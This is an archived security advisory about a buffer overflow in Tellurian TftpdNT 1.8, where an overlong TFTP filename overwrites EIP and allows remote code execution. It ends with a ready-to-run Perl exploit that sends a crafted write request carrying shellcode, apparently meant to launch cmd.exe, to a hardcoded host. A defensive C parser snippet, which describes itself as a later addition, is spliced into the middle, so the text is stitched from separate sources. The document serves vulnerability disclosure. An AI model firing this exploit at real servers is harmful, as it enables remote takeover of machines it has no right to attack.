tellurian.txt

2003-09-04T00:00:00
ID PACKETSTORM:31584
Type packetstorm
Reporter storm
Modified 2003-09-04T00:00:00

Description

`Security Vulnerability in Tellurian TftpdNT (Long Filename)  
------------------------------------------------------------------------   
  
  
  
Article reference:   
http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html  
  
SUMMARY  
  
Tellurian TftpdNT (http://www.tellurian.com.au/) is a TFTP server for Windows   
NT and Windows 9x.   
A buffer overflow vulnerability in the product allows remote attackers to   
overflow an internal buffer and execute arbitrary code.   
  
  
DETAILS  
  
Vulnerable systems:   
* TftpdNT version 1.8   
  
Immune systems:   
* TftpdNT version 2.0   
  
It is possible to cause a buffer overflow in the Tellurian TftpdNT product   
that overwrites EIP, which allows remote command execution.   
The overflow occurs in the product's parsing of the filename.   
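
A bounded parser for the filename and mode fields of a TFTP read/write request (RFC 1350 layout), added here as an example of the length check this class of bug lacks; it is not Tellurian's code and not part of the original advisory. MAX_FILENAME, the struct and the function names are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TFTP_RRQ 1
#define TFTP_WRQ 2
#define MAX_FILENAME 255  /* assumed server-side limit, not Tellurian's */
#define MAX_MODE 8        /* "netascii" is the longest RFC 1350 mode */

struct tftp_request {
    uint16_t opcode;
    char filename[MAX_FILENAME + 1];
    char mode[MAX_MODE + 1];
};

/* Copy one NUL-terminated field out of the datagram without reading past
 * its end or writing past dst. Returns bytes consumed (including the NUL),
 * or 0 if the field is empty, unterminated or longer than max. */
static size_t take_field(const uint8_t *p, size_t left, char *dst, size_t max)
{
    const uint8_t *nul = memchr(p, 0, left);
    if (nul == NULL) return 0;          /* no terminator inside the packet */
    size_t n = (size_t)(nul - p);
    if (n == 0 || n > max) return 0;    /* reject before any copy happens */
    memcpy(dst, p, n + 1);
    return n + 1;
}

/* Returns 0 on success, -1 if the request must be dropped. */
int tftp_parse_request(const uint8_t *pkt, size_t len, struct tftp_request *out)
{
    if (len < 4) return -1;             /* opcode plus two 1-byte fields */
    out->opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (out->opcode != TFTP_RRQ && out->opcode != TFTP_WRQ) return -1;

    size_t off = 2, used;
    used = take_field(pkt + off, len - off, out->filename, MAX_FILENAME);
    if (used == 0) return -1;
    off += used;
    used = take_field(pkt + off, len - off, out->mode, MAX_MODE);
    if (used == 0) return -1;
    return 0;                           /* trailing bytes are ignored */
}
```

A server built this way drops a write request carrying a 511-byte filename instead of copying it into a fixed buffer.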
  
Vendor status:   
The vendor was informed and fixed the issue within 24 hours. A new   
version is available on the web site.   
  
Exploit:   
#!/usr/bin/perl -w   
#Tellurian TFTP Server buffer overflow vulnerability   
  
use IO::Socket;   
$host = "192.168.1.44";   
$port = "69";   
  
$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\   
\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\   
\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\   
\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";   
  
$buf = "\x00\x02";   
$buf .= "\x41"x(508-length($shellcode));   
$buf .= $shellcode;   
$buf .= "\x0F\x02\xC7"; # EIP   
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";   
  
print "Length: ", length($buf), "\n";   
  
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: $@\n";   
$ipaddr = inet_aton($host) || $host;   
$portaddr = sockaddr_in($port, $ipaddr);   
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";   
print "Done\n";   
  
  
  
  
SecurITeam would like to thank STORM (storm@securiteam.com) for finding this   
vulnerability.   
  
--   
Aviram Jenik  
Beyond Security Ltd.  
http://www.BeyondSecurity.com  
http://www.SecuriTeam.com  
`